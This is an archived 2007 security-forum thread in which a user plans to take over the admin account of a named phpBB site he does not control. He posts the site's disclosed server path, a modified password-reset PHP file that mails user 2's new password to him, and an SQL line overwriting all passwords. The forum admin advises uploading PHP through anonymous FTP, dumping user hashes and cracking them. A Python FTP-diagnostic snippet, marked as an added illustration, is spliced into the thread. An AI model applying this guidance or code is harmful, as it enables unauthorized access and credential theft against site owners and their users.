IT Security and Insecurity Portal

How to obtain MD5 hashes on phpbb 2.0.22?

Posted: Fri Dec 21, 2007 1:19 pm
dbzfanatic_1
Regular user
Joined: May 22, 2007
Posts: 12

I can do the rest myself easily enough. The site has html disabled, only standard bbcode, and (for now) the docs directory is still there, unprotected. Here is a full path disclosure of the site.
/home/exosyph/public_html/addon-domain-exosyphenstudios-com/site-forum/profile.php
Any help would be GREATLY appreciated. I know the admin of the site personally and I don't want the hash to get revenge or anything like that, simply to convince him to upgrade to something more secure or at least change his board config.

Posted: Fri Dec 21, 2007 1:37 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

phpbb 2.0.22 happens to be the latest version of the 2.x branch. So there are no known security issues as of today - correct me if I'm wrong.
Your choices are:
1. possibly vulnerable MODs in the target phpbb installation
2. colocated websites on the same webserver

Posted: Fri Dec 21, 2007 1:50 pm
dbzfanatic_1
Regular user
Joined: May 22, 2007
Posts: 12

Thanks for the reply, and as far as I know he doesn't have any MODs installed, and most of the non-standard features he made himself. He's a game programmer and a wiz at C++ and I'm guessing he knows php at least casually. I have a few ideas of exploits but no sure way to implement them. One idea I had was: he has a web server and it seems that anonymous users can upload files (may be mistaken, I haven't tried). I thought that if I could mod the files that resend passwords (already done this on my own site, converted the "generate new pass" to a "recover my pass" feature. Safe enough because I'm the only admin) and upload them to the server then just access them from firefox, reset the password, and have it sent to me instead of his email. This is not easy for me though since I'm a novice (at best) concerning php. I'm not sure about other websites linked to his, and my other idea (only other one that may work) is since the doc directory is still open to possibly access that, change some files to php to send me the password, then access them.
Here's all I have so far, which is the modded usercp_sendpasswd.php file
Code:
<?php
/***************************************************************************
* usercp_sendpasswd.php
* -------------------
* begin : Saturday, Feb 13, 2001
* copyright : (C) 2001 The phpBB Group
* email : support@phpbb.com
*
* $Id: usercp_sendpasswd.php,v 1.6.2.13 2005/09/14 18:14:30 acydburn Exp $
*
*
***************************************************************************/
/***************************************************************************
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
*
***************************************************************************/
if ( isset($HTTP_POST_VARS['submit']) )
{
$username = ( !empty($HTTP_POST_VARS['username']) ) ?
phpbb_clean_username($HTTP_POST_VARS['username']) : '';
$email = ( !empty($HTTP_POST_VARS['email']) ) ?
trim(strip_tags(htmlspecialchars($HTTP_POST_VARS['email']))) : '';
$sql = "SELECT user_id, username, user_email, user_active, user_lang, pw_backup
FROM " . USERS_TABLE . "
WHERE user_id = 2";
if ( $result = $db->sql_query($sql) )
{
if ( $row = $db->sql_fetchrow($result) )
{
if ( !$row['user_active'] )
{
message_die(GENERAL_MESSAGE,
$lang['No_send_account_inactive']);
}
$username = $row['username'];
$user_id = $row['user_id'];
$user_actkey = gen_rand_string(true);
$key_len = 54 - strlen($server_url);
$key_len = ($key_len > 6) ? $key_len : 6;
$user_actkey = substr($user_actkey, 0, $key_len);
$user_password = gen_rand_string(false);
$sql = "UPDATE " . USERS_TABLE . "
SET user_newpasswd = '" . md5($user_password) . "',
user_actkey = '$user_actkey'
WHERE user_id = " . $row['user_id'];
if ( !$db->sql_query($sql) )
{
message_die(GENERAL_ERROR, 'Could not update new password
information', '', __LINE__, __FILE__, $sql);
}
include($phpbb_root_path . 'includes/emailer.'.$phpEx);
$emailer = new emailer($board_config['smtp_delivery']);
$emailer->from($board_config['board_email']);
$emailer->replyto($board_config['board_email']);
$emailer->use_template('user_activate_passwd', $row['user_lang']);
$emailer->email_address("myemail@.com";
$emailer->set_subject($lang['New_password_activation']);
$emailer->assign_vars(array(
'SITENAME' => $board_config['sitename'],
'USERNAME' => $username,
'PASSWORD' => $user_password,
'EMAIL_SIG' => (!empty($board_config['board_email_sig'])) ?
str_replace('<br />', "\n", "-- \n" . $board_config['board_email_sig']) : '',
'U_ACTIVATE' => $server_url . '?mode=activate&' .
POST_USERS_URL . '=' . $user_id . '&act_key=' . $user_actkey)
);
$emailer->send();
$emailer->reset();
$template->assign_vars(array(
'META' => '<meta http-equiv="refresh" content="15;url=' .
append_sid("index.$phpEx") . '">')
);
$message = $lang['Password_updated'] . '<br /><br />' .
sprintf($lang['Click_return_index'], '<a href="' . append_sid("index.$phpEx") . '">',
'</a>');
message_die(GENERAL_MESSAGE, $message);
}
else
{
message_die(GENERAL_MESSAGE, $lang['No_email_match']);
}
}
else
{
message_die(GENERAL_ERROR, 'Could not obtain user information for
sendpassword', '', __LINE__, __FILE__, $sql);
}
}
else
{
$username = '';
$email = '';
}
//
// Output basic page
//
include($phpbb_root_path . 'includes/page_header.'.$phpEx);
$template->set_filenames(array(
'body' => 'profile_send_pass.tpl')
);
make_jumpbox('viewforum.'.$phpEx);
$template->assign_vars(array(
'USERNAME' => $username,
'EMAIL' => $email,
'L_SEND_PASSWORD' => $lang['Send_password'],
'L_ITEMS_REQUIRED' => $lang['Items_required'],
'L_EMAIL_ADDRESS' => $lang['Email_address'],
'L_SUBMIT' => $lang['Submit'],
'L_RESET' => $lang['Reset'],
'S_HIDDEN_FIELDS' => '',
'S_PROFILE_ACTION' => append_sid("profile.$phpEx?mode=sendpassword"))
);
$template->pparse('body');
include($phpbb_root_path . 'includes/page_tail.'.$phpEx);
?>

Posted: Fri Dec 21, 2007 1:55 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

You can upload and/or manipulate php files on the target server? So what's the problem? You can do whatever you want then. With a few php lines, fetch the needed data from the database or modify data directly. Php scripting-level access is considered a higher level than phpbb admin.

Posted: Fri Dec 21, 2007 2:01 pm
dbzfanatic_1
Regular user
Joined: May 22, 2007
Posts: 12

Like I said these are just theories...ideas. I THINK I can upload. I don't know for sure. You also have to remember I don't know a lot of php. I don't know the lines. The best I could do would be
Code:
$pass = md5("w/e pass i want"); $sql = "UPDATE" . USERS_TABLE . " SET user_password = $pass";
This may or may not work, and like I said it's just to prove a point, not get revenge. Even if the anonymous FTP user CAN upload I have no idea WHERE the files would be. All of this is sheer theory.

Posted: Fri Dec 21, 2007 2:05 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Then first try to prove your theory and get access to php level. And then just write a little php code which will fetch all users (or only admins) from the database and write the data to some file or just echo it back. And then try to crack the md5 hashes you fetched.

Posted: Fri Dec 21, 2007 2:15 pm
dbzfanatic_1
Regular user
Joined: May 22, 2007
Posts: 12

Well honestly I'm new to this. I'm a white-hat script kiddie (at best) so right now I need as much help as I can get. I know the sql (more or less) to fetch the password of a specified user, which is what I want. I just can't think of anything that submits an sql query with variables I can exploit. Honestly I don't think it has to be ME doing this, just anyone who can. Proof of concept doesn't care who creates it. I'll admit I'm a computer programmer but the languages I know well enough to use are either outdated (like VB6) or are disabled (like html). I'm also willing to admit I'm not a "master" of any language in the sense I don't know any language fully. I know enough to get by. I have NO skill with FTP since I've never used it before and thus I can't test any of these ideas. I do know that when I login with the anonymous account I do this:
ls
200 PORT command successful
after that it usually gives me a time-out message. When I logout it says
goodbye anonymous. You have uploaded 0 bytes and have downloaded 0 bytes. That is what gave me the impression the anonymous user could upload.

Posted: Fri Dec 21, 2007 2:24 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

If you can log in as anonymous but after the ls command get a timeout, then it seems to be a firewall problem. From the internet:
Code:
Common Firewall
* I can connect to the FTP server. The connection hangs after the ls, dir, put or get command.
o Use passive FTP. This is done with the "passive" command for most command line clients. If your client does not offer the passive command it will use active FTP properly.
So try to use passive mode. And "ls -la" is a better choice - you can see dir and file permissions.

Last edited by waraxe on Fri Dec 21, 2007 2:27 pm; edited 1 time in total

Posted: Fri Dec 21, 2007 2:26 pm
dbzfanatic_1
Regular user
Joined: May 22, 2007
Posts: 12

I'm using the built in (sucky, yes I know) windows ftp client, the one from cmd so I guess I can't use passive mode. I'll try allowing it in my firewall. Also thanks for the info about "ls -la"

Posted: Fri Dec 21, 2007 2:29 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Once you have connected, then logged in use the following command from the Windows FTP command line client:
LITERAL PASV
You should see then "Entering Passive Mode"

Posted: Fri Dec 21, 2007 2:35 pm
dbzfanatic_1
Regular user
Joined: May 22, 2007
Posts: 12

Oh, thank you very much. I told you I'd never done FTP before and I suppose that proved it. I'm only 19 so I deserve a break (not really but it's fun to say). Here's the output I got.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 8 of 50 allowed.
220-Local time is now 08:31. Server port: 21.
220 You will be disconnected after 15 minutes of inactivity.
User (*********.com:(none)):
230 Anonymous user logged in
ftp> LITERAL PASV
227 Entering Passive Mode (**,**,**,**,147,133)
ftp> ls -la
200 PORT command successful
425 Could not open data connection to port 50016: Connection timed out
ftp>
It can't be my firewall because it was turned completely off this time.
Also this may help:
214-The following SITE commands are recognized
ALIAS
CHMOD
IDLE
UTIME
214 Pure-FTPd - http://pureftpd.org/
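The transcript above shows the server acknowledging PASV (227) but the listing still being announced with "200 PORT command successful" followed by a 425: the client kept using active mode, so the server had to connect back to the client and that inbound connection was blocked. The following Python snippet is an added illustration, not code from the thread, that decodes a 227 reply (port = p1*256 + p2 per RFC 959) and flags that active-mode pattern; the transcripts are constructed, with the masked address replaced by a documentation address.

```python
import re

# Constructed transcript modelled on the session quoted above; the masked server
# address is replaced by an RFC 5737 documentation address, not a real host.
SESSION_ACTIVE_FAIL = """\
230 Anonymous user logged in
ftp> LITERAL PASV
227 Entering Passive Mode (192,0,2,10,147,133)
ftp> ls -la
200 PORT command successful
425 Could not open data connection to port 50016: Connection timed out
"""

# Constructed transcript of a listing that succeeds in active mode.
SESSION_ACTIVE_OK = """\
230 Logged on
ftp> ls
200 Port command successful
150 Opening data channel for directory list.
226 Transfer OK
"""

PASV_RE = re.compile(r"^227 .*\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")

def parse_pasv(reply):
    """Decode an RFC 959 '227' reply into (host, port); port = p1*256 + p2."""
    m = PASV_RE.match(reply)
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = (int(g) for g in m.groups())
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2

def diagnose(transcript):
    """Return (verdict, pasv_endpoint) for a client-side FTP transcript."""
    pasv_endpoint, client_used_port = None, False
    for line in transcript.splitlines():
        code = line[:3]
        if code == "227":                 # server offered a passive endpoint
            pasv_endpoint = parse_pasv(line)
        elif code == "200" and line[4:8].upper() == "PORT":
            client_used_port = True       # client asked server to connect back
        elif code == "425" and client_used_port:
            verdict = "active mode blocked"   # inbound data connection refused
            if pasv_endpoint:
                verdict += "; server offered PASV but client still sent PORT"
            return verdict, pasv_endpoint
        elif code == "226" and client_used_port:
            return "active mode works", pasv_endpoint
    return "no data transfer attempted", pasv_endpoint
```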

Posted: Fri Dec 21, 2007 2:43 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

If you have no firewall between you and the ftp server, then the ls command must work without PASSIVE mode, and PASSIVE should work too. How are you connected to the internet? From home, DSL? Maybe your ISP has firewall restrictions. Try some other anonymous ftp servers, like ftp.microsoft.com - do they work? Without PASV?

Posted: Fri Dec 21, 2007 2:45 pm
dbzfanatic_1
Regular user
Joined: May 22, 2007
Posts: 12

I have Charter, so I have a cable modem. I was able to enter passive mode but not much of anything else. If you look at my previous post you'll see the available commands for anonymous users. I may have posted after you started typing your response.

Posted: Fri Dec 21, 2007 2:46 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Still - try other ftp servers in order to determine whether it is a common problem or related only to this specific ftp server.

Posted: Fri Dec 21, 2007 2:49 pm
dbzfanatic_1
Regular user
Joined: May 22, 2007
Posts: 12

This is the output I got from my own website's FTP server. No, I don't generally connect, I just store files there for my members to download.
220 Welcome to the New Chaos Programming FTP Server
User (****:(none)):
501 Syntax error
Login failed.
ftp> user anonymous
331 Password required for anonymous
Password:
230 Logged on
ftp> ls
200 Port command successful
150 Opening data channel for directory list.
incoming
onefile.html
226 Transfer OK
ftp: 24 bytes received in 0.00Seconds 24000.00Kbytes/sec.
ftp>